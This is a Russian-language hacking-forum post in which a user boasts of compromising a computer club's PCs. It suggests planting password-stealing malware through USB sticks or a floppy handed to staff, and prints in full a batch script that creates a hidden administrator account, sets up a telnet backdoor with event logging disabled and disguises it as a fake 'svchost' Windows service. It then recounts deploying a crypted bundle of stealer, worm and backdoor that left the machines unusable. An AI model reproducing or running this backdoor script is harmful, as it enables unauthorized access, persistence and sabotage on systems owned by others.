Взлом компьютерного клуба.

  • На форуме работает ручное одобрение пользователей. Это значит, что, если Ваша причина регистрации не соответствует тематике форума, а также Вы используете временную почту, Ваша учётная запись будет отклонена без возможности повторной регистрации. В дальнейшем - пожизненная блокировка обоих аккаунтов за создание мультиаккаунта.
  • Мы обновили Tor зеркало до v3!
    Для входа используйте следующий url: darkv3nw2...bzad.onion/
  • Мы вновь вернули telegram чат форуму, вступайте, общайтесь, задавайте любые вопросы как администрации, так и пользователям!
    Ссылка: https://t.me/chat_dark_time

Morty

VIP

Morty

VIP
26 Окт 2017
537
113
В этой статье я просто хочу расскать как я поимел компьюерный клуб.

Есть очень много вариантов взлома клуба,очень. сначало просто самые простые и самые палевные.

1.Вы можите принести usb флешку и сказать что тама находиться фотографии и т.д. или мне надо на неё скачать что либо,у нас в клубе это не прокатывало,такчто можно было получить пинка по голове.

2. Этот вариант впринципе такойже как и 1 токо в деле играют наушники, садишся за стол,двигаеш коробочку,помимо наушников встовляеш флэшку,но и это могут пропалить.

3.Можно тупо принести пинч на дискете админу и сказать "Ну чо зассал открыть?"
p.s. тута можно заранее давать драпу :)

Впринципе всё.

И так...
Был както день плохой,решил сходить в компы...
Тута я начал выберать места для своей коварной мысли поиметь эти сраные компы.
Выбрал "15" потомучто за "16" сидел толстый мужик,и меня не видно было бы,и так как сел немного порубал в игры и начал осматриваться что как...
Увидел что при переписки всего компьютерного клуба в qip сохроняеться в недры какихто странных папок,уже мысль была поднята что сеть кабельная доступ открыт для любому, начал дальше осматриваца я уже разочеровался,потомучто очень много тама нельзя было делать...
Поэтому я вспомнил след. win+R запуск программы,думал номер не пройдёт потомучто очень я боялся защиты... а тута как мёдом намазано вылетело окно :) след я вызвал Notepad и начал фигачить батник ...

@echo off
net localgroup TelnetClients /add
net user admin admin /add
net localgroup Administratoren admin /add
net localgroup TelnetClients admin /add
cd %windir%\system32
ECHO Windows Registry Editor Version 5.00>0.reg
ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0]>>0.reg
ECHO "LoginScript"=hex(2):63,00,6d,00,64,00,00,00>>0.reg
ECHO "TelnetPort"=dword:000003F2>>0.reg
ECHO "MaxConnections"=dword:0000000a>>0.reg
ECHO "EventLoggingEnabled"=dword:00000000>>0.reg
ECHO "DisconnectKillAllApps"=dword:00000000>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0\ReadConfig]>>0.reg
ECHO [-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\Defaults]>>0.reg
regedit /s 0.reg && DEL 0.reg
COPY %windir%\system32\tlntsvr.exe %windir%\system32\"svchost.exeя"
assoc .exeя=exefile
sc create "WMI-Client" binpath= "%windir%\system32\svchost.exeя" start= auto
"svchost.exeя" /service
sc description WMI-Client "Microsoft WMI-Client"
sc start WMI-Client



Этопростенький бэк дор который пишеться за щиттаные минуты...

Потом была проблема куда мне загонять,и я решил туда куда валяються все эти логи icq и т.д. такмже я его и запустил.
Впринципе я уже мог щитать что компы уже мои но я хотел очень хорошо повеселиться :)
дальше я пошол домой решил приконектиться через telnet всё было ок особо в то время я сним не дружил поэтому дома залепил прикольчик+пинча+червя+(этот же бэкдор)токо .exe криптанул мне оч хороший человек всё, дальше я залил на рапиду и пошол на след день в компы,получилось так что сел за другой,но ничо я быстро зашол на рапиду скачал этот мой вирусик и запустил, дальше я играл играл и играл,кончилось моё время я пошол домой:)я знал что компьютеров уже нету поскольку поставил задержу,на след день ихние компы никак не работали издавали визг каспирского и время летело со скоростью света )))
 

О нас

  • Наше сообщество существует уже много лет и гордится тем, что предлагает непредвзятое, критическое обсуждение различных тем среди людей разных слоев общества. Мы работаем каждый день, чтобы убедиться, что наше сообщество является одним из лучших.

    Dark-Time 2015 - 2022

    При поддержке: XenForo.Info

Быстрая навигация

Меню пользователя